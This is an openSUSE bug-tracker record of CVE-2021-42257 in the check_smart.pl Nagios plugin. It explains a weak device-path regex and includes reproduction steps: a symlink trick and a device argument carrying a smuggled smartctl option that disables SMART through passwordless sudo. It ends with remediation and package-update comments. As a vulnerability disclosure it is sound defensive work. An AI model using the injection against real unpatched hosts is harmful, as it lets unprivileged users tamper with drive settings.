Bug 1183057 (CVE-2021-42257) - VUL-0: CVE-2021-42257: monitoring-plugins-smart: unprivileged user can modify SMART settings due to insufficient input validation in check_smart.pl
Summary: VUL-0: CVE-2021-42257: monitoring-plugins-smart: unprivileged user can modify...
Status: RESOLVED FIXED
Alias: CVE-2021-42257
Product: openSUSE Distribution
Classification: openSUSE
Component: Security (show other bugs)
Version: Leap 15.1
Hardware: Other Other
: P2 - High : Normal (vote)
Target Milestone: ---
Assignee: Lars Vogdt
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/279235/
Whiteboard:
Keywords:
Depends on:
Blocks: 1176157 1180880
  Show dependency treegraph
 
Reported: 2021-03-04 20:37 UTC by Wolfgang Frisch
Modified: 2021-10-14 19:31 UTC (History)
5 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Wolfgang Frisch 2021-03-04 20:37:50 UTC
+++ This bug was initially created as a clone of Bug #1180880 +++

The script `check_smart.pl` in monitoring-plugins-smart [0] is supposed to gather read-only information about hard drives by calling `smartctl` [1]. The latter requires root privileges, so the package grants passwordless access to the nagios user via `/etc/sudoers.d/monitoring-plugins-smart`.

Example intended usage:
/usr/lib/nagios/plugins/check_smart -i auto -d /dev/sda
>OK: Drive  ST2000LM007-1R8174 S/N WDZJESC2: no SMART errors detected.

An oversight in the script's input validation of the device (-d) parameter allows the unprivileged `nagios` user to modify SMART settings, disable SMART monitoring entirely, shut down the drive or degrade the drive's performance by disabling its read cache.

The -d parameter is validated as follows:
```
if (-b $opt_dl || -c $opt_dl || $opt_dl =~ m/\/dev\/bus\/\d/) {
	$device .= $opt_dl.":";

} else {
	warn "$opt_dl is not a valid block/character special device!\n\n" if $opt_debug;
}
```

So an acceptable device name would be a block special device, a char special device or match the regex `/dev/bus/\d`.
Critically, this regex matches even when /dev/bus/\d is just a _substring_ of any arbitrary directory, for example `/tmp/dev/bus/1/sda`.

Later, this parameter is used to spawn a subprocess:
```
my $full_command = "$smart_command -d $interface -Hi $device"
my @output = `$full_command`;
```

This can be exploited to pass arbitrary parameters to smartctl, some of which affect the drive's behavior negatively.

Steps to reproduce:
-------------------

# simulate nagios user
su -l -s /bin/bash nagios
mkdir -p /tmp/dev/bus/1/
ln -s /dev/sda /tmp/dev/bus/1/
ls -l /tmp/dev/bus/1/sda

>lrwxrwxrwx 1 nagios nagios 8 Mar  4 21:27 /tmp/dev/bus/1/sda -> /dev/sda

/usr/lib/nagios/plugins/check_smart --debug -i auto -d "/tmp/dev/bus/1/sda -s off"

>(debug) executing:
>sudo smartctl -d auto -Hi /tmp/dev/bus/1/sda -s off
>SMART Disabled.

Remediation:
------------
- Improve the validation regex, e.g. ^/dev/bus/\d$
- Prevent shell command injection, e.g. by passing a list to the system function.

[0] https://github.com/Napsty/check_smart/
[1] https://www.smartmontools.org/
Comment 7 Lars Vogdt 2021-05-10 11:20:23 UTC
Upgraded package submitted in server:monitoring.

SR to openSUSE:Factory               -> 892019
openSUSE:Backports:SLE-15-SP1:Update -> 892015
openSUSE:Backports:SLE-15-SP2:Update -> 892016
openSUSE:Backports:SLE-15-SP3        -> 892017
openSUSE:Leap:15.2:Update            -> 892018

All upgraded to the version in server:monitoring. 
Suggestion for the Patchinfo:

This upgrade to version 6.9.1 mainly fixes a security issue, which allows an attacker to modify SMART settings due to insufficient input validation in check_smart (bsc#1183057).

In addition, the following new features are integrated:
+ Allows using PCI device paths as device name(s) (#64)
+ Introduce new optional parameter -l/--ssd-lifetime) which additionally  
  checks SMART attribute "Percent_Lifetime_Remain"  
  (available on some SSD drives). (#66 #67)
+ Allow skip self-assessment check (--skip-self-assessment)
+ Add Command_Timeout to default raw list
+ Added support for NVMe drives
+ The feature was requested in #30 . This PR adds the possibility to
  use 3ware,N and cciss,N drives in combination with the 
  global -g parameter.
+ Furthermore this PR adjusts the output of the plugin when the -g 
  is used in combination with hardware raid controllers. Instead of
  showing the logical device name (/dev/sda for example), the plugin
  will now show the controller with drive number
+ Add Reported_Uncorrect and Reallocated_Event_Count to default raw list.
Comment 8 OBSbugzilla Bot 2021-05-10 12:20:03 UTC
This is an autogenerated message for OBS integration:
This bug (1183057) was mentioned in
https://build.opensuse.org/request/show/892023 Factory / monitoring-plugins-smart
https://build.opensuse.org/request/show/892024 Backports:SLE-15-SP1 / monitoring-plugins-smart
https://build.opensuse.org/request/show/892025 Backports:SLE-15-SP2 / monitoring-plugins-smart
https://build.opensuse.org/request/show/892026 Backports:SLE-15-SP3 / monitoring-plugins-smart
https://build.opensuse.org/request/show/892027 15.2 / monitoring-plugins-smart
Comment 9 Swamp Workflow Management 2021-05-10 22:18:05 UTC
openSUSE-SU-2021:0706-1: An update that contains security fixes can now be installed.

Category: security (important)
Bug References: 1183057
CVE References: 
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    monitoring-plugins-smart-6.9.1-lp152.4.3.1
openSUSE Backports SLE-15-SP2 (src):    monitoring-plugins-smart-6.9.1-bp152.4.3.1
openSUSE Backports SLE-15-SP1 (src):    monitoring-plugins-smart-6.9.1-bp151.4.3.1
Comment 10 Wolfgang Frisch 2021-10-14 16:30:23 UTC
CVE-2021-42257 was assigned to this issue.